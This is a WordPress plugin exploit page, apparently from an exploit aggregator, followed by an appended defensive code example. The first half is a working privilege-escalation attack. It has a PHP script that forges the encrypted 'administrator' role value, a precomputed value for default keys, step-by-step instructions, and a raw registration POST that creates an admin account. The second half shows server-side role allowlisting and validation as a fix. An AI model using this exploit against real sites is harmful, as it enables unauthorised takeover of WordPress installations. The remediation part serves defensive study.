## https://sploitus.com/exploit?id=WPEX-ID:9486744E-AB24-44E4-B06E-9E0B4BE132E2
Generate the encrypted string for 'administrator' with the script below. If the default salts/keys are used in the wp-config.php file, the encrypted string for an administrator account is: "bXFaYVc1WjJlNzlXTXRsbkxSZFptdz09"

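```php
<?php
// Both values come from wp-config.php
$secret_key = 'REPLACE_ME_WITH_AUTH_KEY';  // AUTH_KEY
$secret_iv  = 'REPLACE_ME_WITH_AUTH_SALT'; // AUTH_SALT

$encrypt_method = 'AES-256-CBC';
// Key and IV are derived deterministically from the two constants above
$key            = hash( 'sha256', $secret_key );
$iv             = substr( hash( 'sha256', $secret_iv ), 0, 16 );
// openssl_encrypt() already returns base64 (options = 0); the result is base64-encoded a second time
$encoded_id     = base64_encode( openssl_encrypt( 'administrator', $encrypt_method, $key, 0, $iv ) );

echo $encoded_id . "\r\n";
?>
```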


1. Visit the registration page of the plugin
2. Edit the form HTML and change the input "urhidden" to the generated encrypted value
3. Submit the registration. You will now have an administrator-level account.


```http
POST /wpuf-registration/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
Connection: close
Upgrade-Insecure-Requests: 1

reg_fname=Attacker&reg_lname=Admin&reg_email=attacker%40localhost.org&log=attacker&pwd1=Passw0rd&pwd2=Passw0rd&wp-submit=Register&urhidden=XXXXXXXXXXXXXXXXXXXX&wpuf_registration=true&action=registration&_wpnonce=b6c5a58299
```
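
The request above succeeds because the role is read from a client-editable field whose only protection is a key and IV that may be known. The following is an added example, not the plugin's code or its actual fix, of resolving the role on the server against an allowlist; the function names, the allowlist contents and the sample keys are assumptions.

```php
<?php
// Added example: server-side handling of the hidden role field ("urhidden").
// Function names, the allowlist and the sample keys are hypothetical.

const ALLOWED_SIGNUP_ROLES = ['subscriber', 'contributor']; // assumption: site policy
const FALLBACK_ROLE        = 'subscriber';

// Inverse of the encoding shown on the page; returns null on any malformed input.
function decode_role_field(string $field, string $auth_key, string $auth_salt): ?string
{
    $key   = hash('sha256', $auth_key);
    $iv    = substr(hash('sha256', $auth_salt), 0, 16);
    $inner = base64_decode($field, true);
    if ($inner === false || $inner === '') {
        return null;
    }
    $plain = openssl_decrypt($inner, 'AES-256-CBC', $key, 0, $iv);
    return $plain === false ? null : $plain;
}

// Decryption succeeding proves nothing about who produced the value, so the
// decoded role is only accepted if it is on the self-registration allowlist.
function resolve_signup_role(?string $field, string $auth_key, string $auth_salt): string
{
    if ($field === null || $field === '') {
        return FALLBACK_ROLE;
    }
    $role = decode_role_field($field, $auth_key, $auth_salt);
    if ($role === null || !in_array($role, ALLOWED_SIGNUP_ROLES, true)) {
        // Worth alerting on: a legitimate form never submits a role outside the list.
        error_log('registration: rejected role field, using ' . FALLBACK_ROLE);
        return FALLBACK_ROLE;
    }
    return $role;
}

// Constructed sample values, not real site keys.
$k = 'constructed-auth-key';
$s = 'constructed-auth-salt';
$encode = fn(string $role): string => base64_encode(openssl_encrypt(
    $role, 'AES-256-CBC', hash('sha256', $k), 0, substr(hash('sha256', $s), 0, 16)
));

var_dump(resolve_signup_role($encode('contributor'), $k, $s));
var_dump(resolve_signup_role($encode('administrator'), $k, $s));
var_dump(resolve_signup_role('not-base64!!', $k, $s));
```

Replacing default AUTH_KEY and AUTH_SALT values removes the known-key case the page mentions, but the allowlist is what keeps an elevated role from being accepted when the keys are known.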